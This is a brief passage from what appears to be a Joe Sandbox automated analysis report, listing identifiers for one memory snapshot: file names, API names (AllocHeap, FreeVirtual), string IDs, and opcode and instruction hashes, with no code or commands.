                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocHeap$FreeVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 3499195154-0
                                                                                      • Opcode ID: 817a8a581052b96c9f9a72538d17e48b6576cde85557c41beef5e628232b7b87
                                                                                      • Instruction ID: 649e2d90f75f34e424309cacc0d0360b212119e466093e87a3bb8a1dc1113c7f
                                                                                      • Opcode Fuzzy Hash: 817a8a581052b96c9f9a72538d17e48b6576cde85557c41beef5e628232b7b87
                                                                                      • Instruction Fuzzy Hash: 1E1124306006019FD7218F59EE459267BB6FB89724711493DF292FA1F0CB729869CF58